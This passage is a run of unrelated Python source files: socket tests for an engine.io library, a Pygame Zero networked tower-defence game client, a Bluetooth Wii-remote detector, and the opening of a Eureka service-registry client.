s.send(pkt2)
assert s.poll() == [pkt1, pkt2]
def test_poll_none(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.put(None)
assert s.poll() == []
def test_poll_none_after_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt = packet.Packet(packet.MESSAGE, data='hello')
s.send(pkt)
s.queue.put(None)
assert s.poll() == [pkt]
assert s.poll() == []
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
assert len(r) == 1
assert r[0].encode(), b'3abc'
def test_message_async_handler(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with(
'message', 'sid', 'foo', run_async=True
)
def test_message_sync_handler(self):
mock_server = self._get_mock_server()
mock_server.async_handlers = False
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with(
'message', 'sid', 'foo', run_async=False
)
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
with pytest.raises(exceptions.UnknownPacketError):
s.receive(packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = 6
mock_server.ping_interval_grace_period = 2
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 9
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=False)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
assert packets == [pkt1, pkt2]
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
with pytest.raises(exceptions.QueueEmpty):
s.handle_get_request(environ, start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {
'REQUEST_METHOD': 'POST',
'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p),
'wsgi.input': six.BytesIO(p),
}
s.handle_post_request(environ)
assert s.receive.call_count == 2
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {
'REQUEST_METHOD': 'POST',
'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p),
'wsgi.input': six.BytesIO(p),
}
with pytest.raises(exceptions.ContentTooLongError):
s.handle_post_request(environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {
'REQUEST_METHOD': 'GET',
'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket',
}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server._async['websocket'] = mock.MagicMock()
mock_ws = mock.MagicMock()
mock_server._async['websocket'].return_value = mock_ws
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server._async['websocket'].assert_called_once_with(
s._websocket_handler
)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server._async['websocket'] = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.upgraded = True
environ = "foo"
start_response = "bar"
with pytest.raises(IOError):
s._upgrade_websocket(environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
assert len(r) == 1
assert r[0].encode() == packet.Packet(packet.NOOP).encode()
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False
)
s._websocket_handler(ws)
assert not s.upgraded
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False),
]
s._websocket_handler(ws)
ws.send.assert_called_once_with(
packet.Packet(packet.PONG, data=probe).encode(always_bytes=False)
)
assert s.queue.get().packet_type == packet.NOOP
assert not s.upgraded
def test_close_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.close = mock.MagicMock()
s.receive(packet.Packet(packet.CLOSE))
s.close.assert_called_once_with(wait=False, abort=True)
def test_invalid_packet_type(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt = packet.Packet(packet_type=99)
with pytest.raises(exceptions.UnknownPacketError):
s.receive(pkt)
def test_upgrade_not_supported(self):
mock_server = self._get_mock_server()
mock_server._async['websocket'] = None
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server._bad_request.assert_called_once_with()
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
None,
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.connected
assert s.upgraded
assert mock_server._trigger_event.call_count == 2
mock_server._trigger_event.assert_has_calls(
[
mock.call('message', 'sid', 'foo', run_async=True),
mock.call('disconnect', 'sid', run_async=False),
]
)
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
None,
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.upgraded
assert mock_server._trigger_event.call_count == 2
mock_server._trigger_event.assert_has_calls(
[
mock.call('message', 'sid', 'foo', run_async=True),
mock.call('disconnect', 'sid', run_async=False),
]
)
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_with_payload(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
probe = six.text_type('probe')
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.UPGRADE, data=b'2').encode(
always_bytes=False
),
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.upgraded
def test_websocket_upgrade_with_backlog(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
probe = six.text_type('probe')
foo = six.text_type('foo')
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.UPGRADE, data=b'2').encode(
always_bytes=False
),
]
s.upgrading = True
s.send(packet.Packet(packet.MESSAGE, data=foo))
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=sid'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
assert len(packets) == 1
assert packets[0].encode() == b'6'
packets = s.poll()
assert len(packets) == 1
assert packets[0].encode() == b'4foo'
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.upgraded
assert not s.upgrading
packets = s.handle_get_request(environ, start_response)
assert len(packets) == 1
assert packets[0].encode() == b'6'
def test_websocket_read_write_wait_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
RuntimeError,
]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.closed
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
None,
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.connected
assert mock_server._trigger_event.call_count == 2
mock_server._trigger_event.assert_has_calls(
[
mock.call('message', 'sid', foo, run_async=True),
mock.call('disconnect', 'sid', run_async=False),
]
)
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
with pytest.raises(exceptions.SocketIsClosedError):
s.send(packet.Packet(packet.NOOP))
def test_close_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
assert s.closed
assert mock_server._trigger_event.call_count == 1
mock_server._trigger_event.assert_called_once_with(
'disconnect', 'sid', run_async=False
)
s.close()
assert mock_server._trigger_event.call_count == 1
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
assert s.queue.join.call_count == 0
|
gameClientNoGUI.py
|
# -*- coding: utf-8 -*-
# 这是没有GUI欢迎界面的游戏客户端, 不需安装EasyGui即可运行
import pgzrun
import random
from pgzero.actor import Actor
from pgzero.rect import Rect, ZRect
from pgzero.screen import Screen
from backstageNoGUI import flag, game, waiting, ide, clicktime, tcpCliSock, account, target, connect, Game, Command, syncTimeCount
from Roadpos_set import road
from config import *
import threading
from time import sleep, time
from math import ceil
import sys
screen: Screen # 类型标注
# 升级按钮图标对象
upgradeIcon_main = Actor('upgrade')
upgradeIcon_up = Actor('upgrade')
upgradeIcon_mid = Actor('upgrade')
upgradeIcon_down = Actor('upgrade')
upgrade_button = [upgradeIcon_main, upgradeIcon_up,
upgradeIcon_mid, upgradeIcon_down]
# 血量图标对象
player_icon = Actor('人图标')
life_frame = Actor('血框')
life_block = Actor('血块')
life_icon = Actor('生命值图标')
DenfenseTower_icon = Actor('防御塔图标')
Base_icon = Actor('主塔图标')
# 云雾显示对象
yun1 = Actor('云上')
yun1.topleft = 250, 0
yun2 = Actor('云上中')
yun2.topleft = 250, 0
yun3 = Actor('云中')
yun3.topleft = 250, 0
yun4 = Actor('云中下')
yun4.topleft = 250, 0
yun5 = Actor('云下')
yun5.topleft = 250, 0
# 金钱图标对象
money_0 = Actor('金钱框')
money_0.topleft = 975, 100
money_2 = Actor('钱币图标')
money_2.topleft = 975, 77
money_1 = Actor('金钱块')
# 显示页面大小
WIDTH = 1200
HEIGHT = 700
# 创建造兵按钮 #长宽70
warrior_up = Actor('小兵', (70 + 960, 385))
archer_up = Actor('弓箭手', (166 + 960, 385))
warrior_mid = Actor('小兵', (70 + 960, 510))
archer_mid = Actor('弓箭手', (166 + 960, 510))
warrior_down = Actor('小兵', (70 + 960, 635))
archer_down = Actor('弓箭手', (166 + 960, 635))
def draw():
screen.clear()
screen.fill("white")
screen.blit('bk', (250, 0))
# 金钱部分
money_0.draw()
money_2.draw()
for i in range(game.money):
money_1.topleft = 978 + 20 * i, 103
money_1.draw()
screen.draw.text("Money:%d/10" % game.money, (1000, 82), color='black')
# 兵营部分
screen.blit('arsenal', (20 + 960, 190))
screen.blit('soldier', (21 + 960, 280))
warrior_up.draw()
archer_up.draw()
warrior_mid.draw()
archer_mid.draw()
warrior_down.draw()
archer_down.draw()
# 兵种部分
for r in range(3):
for w in game.w1[r]:
if w.wType == 1:
screen.blit('turret', (road[r][w.pos][w.wGrid]))
elif w.wType == 2:
screen.blit('knight' + str(ceil(10 * w.wLife /
KnightLife)), (road[r][w.pos][w.wGrid]))
elif w.wType == 3:
screen.blit('archer' + str(ceil(10 * w.wLife /
ArcherLife)), (road[r][w.pos][w.wGrid]))
for w in game.w2[r]:
if w.wType == 1:
screen.blit('turret', (road[r][w.pos][w.wGrid]))
elif w.wType == 2:
screen.blit('knighte' + str(ceil(10 * w.wLife /
KnightLife)), (road[r][w.pos][w.wGrid]))
elif w.wType == 3:
screen.blit('archere' + str(ceil(10 * w.wLife /
ArcherLife)), (road[r][w.pos][w.wGrid]))
# 云雾部分
if game.life[6] > 0:
yun3.draw()
if game.life[5] > 0:
yun2.draw()
if game.life[7] > 0:
yun5.draw()
if game.life[5] > 0:
yun1.draw()
if game.life[7] > 0:
yun5.draw()
# 血量部分
for j in range(8):
if j > 3:
dfx = 0
dfy = -640
else:
dfx = 0
dfy = 0
life_frame.topleft = 25 + dfx, 440 + j * 70 + dfy
life_icon.topleft = 24 + dfx, 421 + j * 70 + dfy
if j <= 3:
upgrade_button[j].topleft = 230 + dfx, 441 + j * 70 + dfy
upgrade_button[j].draw()
if j % 4 == 0:
Base_icon.topleft = 211+dfx, 416+j*70+dfy
Base_icon.draw()
screen.draw.text("Base", (170+dfx, 422+70*j+dfy), color='black')
else:
DenfenseTower_icon.topleft = 218+dfx, 417+j*70+dfy
DenfenseTower_icon.draw()
if (j-1) % 4 == 0:
screen.draw.text(
"Turret(top)", (138+dfx, 422+70*j+dfy), color='black')
elif (j-2) % 4 == 0:
screen.draw.text(
"Turret(mid)", (138+dfx, 422+70*j+dfy), color='black')
else:
screen.draw.text(
"Turret(bot)", (138+dfx, 422+70*j+dfy), color='black')
life_frame.draw()
life_icon.draw()
for i in range(game.life[j]):
if j % 4 == 0:
life_block.topleft = 27+2*i//3+dfx, 443+70*j+dfy
else:
life_block.topleft = 27+4*i//3+dfx, 443+70*j+dfy
life_block.draw()
if j % 4 == 0:
screen.draw.text(
"Life:%d/300" % game.life[j], (43+dfx, 422+70*j+dfy), color='black')
else:
screen.draw.text(
"Life:%d/150" % game.life[j], (43 + dfx, 422 + 70 * j + dfy), color='black')
player_icon.topleft = 27, 380
player_icon.draw()
player_icon.topleft = 27, 20
player_icon.draw()
screen.draw.text(
"player: %s" % ide[0], (52, 382), color='black', fontname='use', fontsize=20)
screen.draw.text("player: %s" %
ide[1], (52, 22), color='black', fontname='use', fontsize=20)
# 鼠标点击特定位置时执行对应指令
def on_mouse_down(pos): # 造兵方式
global clicktime
if clicktime == 0:
clicktime = time()
elif clicktime != 0 and time() - clicktime < 0.3:
print("点的太快了!") # 限制点击频率避免同步异常
return
else:
clicktime = time()
order_command = Command(game.turnID + 30, -1, [0])
for i in range(4):
if i == 0:
if upgrade_button[i].collidepoint(pos) and game.money >= 10:
game.money -= 10
order_command.CmdType = 0
order_command.turnID -= 10 # 相比造兵, 升级指令执行得快一些
order_command.CmdStr = [0]
else:
if upgrade_button[i].collidepoint(pos) and game.money >= 5:
game.money -= 5
order_command.CmdType = 0
order_command.turnID -= 10
order_command.CmdStr = [i]
if warrior_up.collidepoint(pos) and game.money >= 2:
game.money -= 2
order_command.CmdType = 2
order_command.CmdStr = [1]
elif archer_up.collidepoint(pos) and game.money >= 3:
game.money -= 3
order_command.CmdType = 3
order_command.CmdStr = [1]
elif warrior_mid.collidepoint(pos) and game.money >= 2:
game.money -= 2
order_command.CmdType = 2
order_command.CmdStr = [2]
elif archer_mid.collidepoint(pos) and game.money >= 3:
game.money -= 3
order_command.CmdType = 3
order_command.CmdStr = [2]
elif warrior_down.collidepoint(pos) and game.money >= 2:
game.money -= 2
order_command.CmdType = 2
order_command.CmdStr = [3]
elif archer_down.collidepoint(pos) and game.money >= 3:
game.money -= 3
order_command.CmdType = 3
order_command.CmdStr = [3]
if order_command.CmdType >= 0:
game.ops1.put(order_command)
game.sendCmd(target[0], order_command, 1) # 发送指令给对方
def update(dt):
# 初始化回合
game.update()
# 同步
waiting()
flag[0] -= 1
if flag[0] == 0:
game.sendCmd(target[0], '', 0)
# 读取命令
game.ReadCmd()
# 检查可行的战斗
game.BattleCheck()
# 完成战斗
game.BattleRun()
# 武士死亡结算
game.WarriorDeath()
# 武士移动
for i in range(3):
game.WarriorMove(game.w1[i], 1)
game.WarriorMove(game.w2[i], 2)
# 主塔死亡结算
result = game.BaseDeath()
#若一方主塔死亡, 启动游戏终结机制
# 更新画面
draw()
if result > 0:
for i in range(5):
# 多发几次同步指令确保对方正确显示游戏结果
game.sendCmd(target[0], '', 0)
sleep(0.2)
msg = '游戏结束, '
if result == 1:
msg += '你赢了!'
elif result == 2:
msg += '你挂了!'
tcpCliSock.close()
print(msg)
print('再见!')
sys.exit(0)
def on_music_end():
music.play_once(random.choice(['东方_1', '东方_2']))
def startGame():
# 开始游戏的流程仍需处理
connect() # 连接到服务器
# 账号/昵称
ide.append(str(account[0]))
ide.append(str(target[0]))
global game
# 创建新游戏并初始化
game = Game()
game.reset()
# 打开通信接口
getCmd = game.getCmd(game) # 命令接收线程
getCmd.start()
game.sendCmd(target[0], '', 0) # 发送同步指令表示自己已上线
waiting() # 等待对手上线
print('游戏开始了!')
# 放音乐
music.set_volume(0.3)
music.play_once('bgm_1')
# 同时开启游戏和接受命令的线程
g = threading.Thread(target=pgzrun.go()) # 游戏线程
g.start()
getCmd.join()
g.join()
startGame()
|
moteDetector.py
|
import bluetooth
import select
import time
import threading
from moteCache import MoteCache
class SimpleDiscoverer(bluetooth.DeviceDiscoverer):
def __init__(self):
bluetooth.DeviceDiscoverer.__init__(self)
def pre_inquiry(self):
self.done = False
def device_discovered(self, address, device_class, name):
# print "%s - %s" % (address, name)
self.discoverCallback(address, device_class, name)
return
# get some information out of the device class and display it.
# voodoo magic specified at:
#
# https://www.bluetooth.org/foundry/assignnumb/document/baseband
major_classes = ( "Miscellaneous",
"Computer",
"Phone",
"LAN/Network Access point",
"Audio/Video",
"Peripheral",
"Imaging" )
major_class = (device_class >> 8) & 0xf
if major_class < 7:
print " %s" % major_classes[major_class]
else:
print " Uncategorized"
print " services:"
service_classes = ( (16, "positioning"),
(17, "networking"),
(18, "rendering"),
(19, "capturing"),
(20, "object transfer"),
(21, "audio"),
(22, "telephony"),
(23, "information"))
for bitpos, classname in service_classes:
if device_class & (1 << (bitpos-1)):
print " %s" % classname
def inquiry_complete(self):
self.done = True
class MoteDetector(): # just uses the simple class above from a bluetooth example.
def __init__(self, detectedCallback, getAlreadyConnectedIdsCallback, numToConnect=1):
self.detectedCallback = detectedCallback
self.getAlreadyConnectedIdsCallback = getAlreadyConnectedIdsCallback
self.discoverThread = None
self.d = None
self.knownBTIds = []
moteCache = MoteCache()
moteCache.read()
self.knownMoteIds = moteCache.getMotes()
if len(self.knownMoteIds) == 0:
print "********** WARNING: not mote cache detected, no motes will be found this way."
#self.knownMoteIds = {"00:1E:A9:4F:59:8E":""}
self.shortCheckDelay=3.0
self.allConnectedDelay=3.0
self.shortTimeout = 2.0
self.numToConnect = numToConnect
self.searchEvent = threading.Event() # signals when to start looking for more motes
self.keepFirstConnection=False
def discoverIteration(self):
rfds = select.select( self.readfiles, [], [] )[0]
if self.d in rfds:
self.d.process_event()
return self.d.done
def readyForLongCheck(self):
return False
def readyForShortCheck(self):
return True
def discoverCallback(self, address, device_class, name):
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
if address not in connectedMoteIds and address not in self.knownBTIds:
print "DISCOVER CALLBACK:", address, device_class, name
if type(name) == type(""):
if "nintendo" in name.lower():
self.detectedCallback(address, device_class, name)
else:
print "WARNING: NEED to request NAME (for never used motes)"
self.knownBTIds.append(address)
def tryKnownIds(self):
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
for moteId in self.knownMoteIds.keys():
if moteId not in connectedMoteIds:
try:
print "trying to connect to known mote id:", moteId
INTERRUPT_PORT = 19
tmpIntSock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
tmpIntSock.settimeout(self.shortTimeout)
tmpIntSock.connect( (moteId, INTERRUPT_PORT) )
if self.keepFirstConnection:
self.detectedCallback(moteId, tmpIntSock)
tmpIntSock = 0
else:
tmpIntSock.close() # succeeded
#self.detectedCallback(moteId, None, None)
self.detectedCallback(moteId)
except bluetooth.BluetoothError, e:
if e.message == "timed out":
print "timed out"
else:
print "Err no.:", e.errno, "Error msg:", e.message
try:
tmpIntSock.close() # succeeded
except Exception, e:
print "Error trying to close socket with failed connection. Err no.:", e.errno, "Error msg:", e.message
time.sleep(0.001)
def discoverLoop(self):
print "DISCOVERLOOOP"
if self.readyForShortCheck():
self.tryKnownIds()
if self.readyForLongCheck():
while self.readyForLongCheck():
if self.readyForShortCheck():
self.tryKnownIds()
self.d = SimpleDiscoverer()
self.d.discoverCallback = self.discoverCallback
while 1:
#self.d.find_devices(lookup_names = True)
self.d.find_devices(lookup_names = False)
self.readfiles = [ self.d, ]
done = False
while done == False:
done = self.discoverIteration()
else:
print "DISCOVERLOOOP_B"
while 1:
try:
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
print "DISCOVERLOOOP_C", len(connectedMoteIds), self.numToConnect
if len(connectedMoteIds) < self.numToConnect:
print "DISCOVERLOOOP_D", len(connectedMoteIds), self.numToConnect
self.tryKnownIds()
time.sleep(self.shortCheckDelay)
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
else:
#time.sleep(self.allConnectedDelay)
print "searchEvent wait"
self.searchEvent.wait()
print "searchEvent finished waiting"
except:
traceback.print_exc()
def reinitiateSearching(self):
self.searchEvent.set() # calling set and clear will wake the discoverLoop
self.searchEvent.clear()
def startInThread(self):
self.discoverThread = threading.Thread(target=self.discoverLoop)
self.discoverThread.start()
def startWithoutThread(self):
self.discoverLoop()
if __name__ == "__main__":
from connectToMote import connectToMote
class NewMoteHandler:
def __init__(self):
self.motes = {}
def handleNewMoteCallback(self, address, device_class, name):
if address not in self.motes.keys():
self.connectToMote(address)
def connectToMote(self, moteId):
mote = connectToMote(moteId)
if mote.connected:
self.motes[moteId] = mote
def getConnectedMoteIds(self):
return self.motes.keys()
moteHandler = NewMoteHandler()
detector = MoteDetector(detectedCallback=moteHandler.handleNewMoteCallback, getAlreadyConnectedIdsCallback=moteHandler.getConnectedMoteIds, numToConnect=1)
detector.startInThread()
count = 0
import time
numPoints = 0
startTime = time.time()
reportInterval = 0.5
lastReport = startTime
while 1:
for moteId, mote in moteHandler.motes.items():
#print "mote:", moteId, mote.extractNormalizedPoints()
numPoints += len(mote.extractNormalizedPoints())
#print "Numpoints:", numPoints
currentTime = time.time()
elapsedTime = currentTime - lastReport
if elapsedTime > reportInterval:
print "pts/sec:", numPoints / elapsedTime
numPoints = 0
lastReport = currentTime
|
eureka_client.py
|
# -*- coding: utf-8 -*-
import atexit
import json
import os
import re
import socket
import time
import random
import inspect
import xml.etree.ElementTree as ElementTree
from threading import Timer
from threading import RLock
from threading import Thread
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from py_eureka_client.__logger__ import get_logger
import py_eureka_client.http_client as http_client
try:
long(0)
except NameError:
# python 3 does no longer support long method, use int instead
long = int
_logger = get_logger("EurekaClient")
"""
Status of instances
"""
INSTANCE_STATUS_UP = "UP"
INSTANCE_STATUS_DOWN = "DOWN"
INSTANCE_STATUS_STARTING = "STARTING"
INSTANCE_STATUS_OUT_OF_SERVICE = "OUT_OF_SERVICE"
INSTANCE_STATUS_UNKNOWN = "UNKNOWN"
"""
Action type of instances
"""
ACTION_TYPE_ADDED = "ADDED"
ACTION_TYPE_MODIFIED = "MODIFIED"
ACTION_TYPE_DELETED = "DELETED"
"""
This is for the DiscoveryClient, when this strategy is set, get_service_url will random choose one of the UP instance and return its url
This is the default strategy
"""
HA_STRATEGY_RANDOM = 1
"""
This is for the DiscoveryClient, when this strategy is set, get_service_url will always return one instance until it is down
"""
HA_STRATEGY_STICK = 2
"""
This is for the DiscoveryClient, when this strategy is set, get_service_url will always return a new instance if any other instances are up
"""
HA_STRATEGY_OTHER = 3
"""
The timeout seconds that all http request to the eureka server
"""
_DEFAULT_TIME_OUT = 5
"""
Default eureka server url.
"""
_DEFAULT_EUREKA_SERVER_URL = "http://127.0.0.1:8761/eureka/"
"""
Default instance field values
"""
_DEFAULT_INSTNACE_PORT = 9090
_DEFAULT_INSTNACE_SECURE_PORT = 9443
_RENEWAL_INTERVAL_IN_SECS = 30
_DURATION_IN_SECS = 90
_DEFAULT_DATA_CENTER_INFO = "MyOwn"
_DEFAULT_DATA_CENTER_INFO_CLASS = "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo"
"""
Default encoding
"""
_DEFAULT_ENCODING = "utf-8"
### =========================> Base Mehods <======================================== ###
### Beans ###
class Applications:
def __init__(self,
apps__hashcode="",
versions__delta="",
applications=None):
self.apps__hashcode = apps__hashcode
self.versions__delta = versions__delta
self.__applications = applications if applications is not None else []
self.__application_name_dic = {}
self.__app_lock = RLock()
@property
def appsHashcode(self):
return self.apps__hashcode
@property
def applications(self):
return self.__applications
@property
def versionsDelta(self):
return self.versions__delta
def add_application(self, application):
with self.__app_lock:
self.__applications.append(application)
self.__application_name_dic[application.name] = application
def get_application(self, app_name):
with self.__app_lock:
if app_name in self.__application_name_dic:
return self.__application_name_dic[app_name]
else:
return Application(name=app_name)
class Application:
def __init__(self,
name="",
instances=None):
self.name = name
self.__instances = instances if instances is not None else []
self.__instances_dict = {}
self.__inst_lock = RLock()
@property
def instances(self):
with self.__inst_lock:
return self.__instances
@property
def up_instances(self):
with self.__inst_lock:
up_inst = []
for item in self.__instances:
if item.status == INSTANCE_STATUS_UP:
up_inst.append(item)
return up_inst
def get_instance(self, instance_id):
with self.__inst_lock:
if instance_id in self.__instances_dict:
return self.__instances_dict[instance_id]
else:
return None
def add_instance(self, instance):
with self.__inst_lock:
self.__instances.append(instance)
self.__instances_dict[instance.instanceId] = instance
def update_instance(self, instance):
with self.__inst_lock:
_logger.debug("update instance %s" % instance.instanceId)
updated = False
for idx in range(len(self.__instances)):
ele = self.__instances[idx]
if ele.instanceId == instance.instanceId:
_logger.debug("updating index %d" % idx)
self.__instances[idx] = instance
updated = True
break
if not updated:
self.add_instance(instance)
def remove_instance(self, instance):
with self.__inst_lock:
for idx in range(len(self.__instances)):
ele = self.__instances[idx]
if ele.instanceId == instance.instanceId:
del self.__instances[idx]
break
if instance.instanceId in self.__instances_dict:
del self.__instances_dict[instance.instanceId]
class LeaseInfo:
def __init__(self,
renewalIntervalInSecs=_RENEWAL_INTERVAL_IN_SECS,
durationInSecs=_DURATION_IN_SECS,
registrationTimestamp=0,
lastRenewalTimestamp=0,
renewalTimestamp=0,
evictionTimestamp=0,
serviceUpTimestamp=0):
self.renewalIntervalInSecs = renewalIntervalInSecs
self.durationInSecs = durationInSecs
self.registrationTimestamp = registrationTimestamp
self.lastRenewalTimestamp = lastRenewalTimestamp
self.renewalTimestamp = renewalTimestamp
self.evictionTimestamp = evictionTimestamp
self.serviceUpTimestamp = serviceUpTimestamp
class DataCenterInfo:
def __init__(self,
name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
className=_DEFAULT_DATA_CENTER_INFO_CLASS):
self.name = name
self.className = className
class PortWrapper:
def __init__(self, port=0, enabled=False):
self.port = port
self.enabled = enabled
class Instance:
def __init__(self,
instanceId="",
sid="", # @deprecated
app="",
appGroupName="",
ipAddr="",
port=PortWrapper(port=_DEFAULT_INSTNACE_PORT, enabled=True),
securePort=PortWrapper(port=_DEFAULT_INSTNACE_SECURE_PORT, enabled=False),
homePageUrl="",
statusPageUrl="",
healthCheckUrl="",
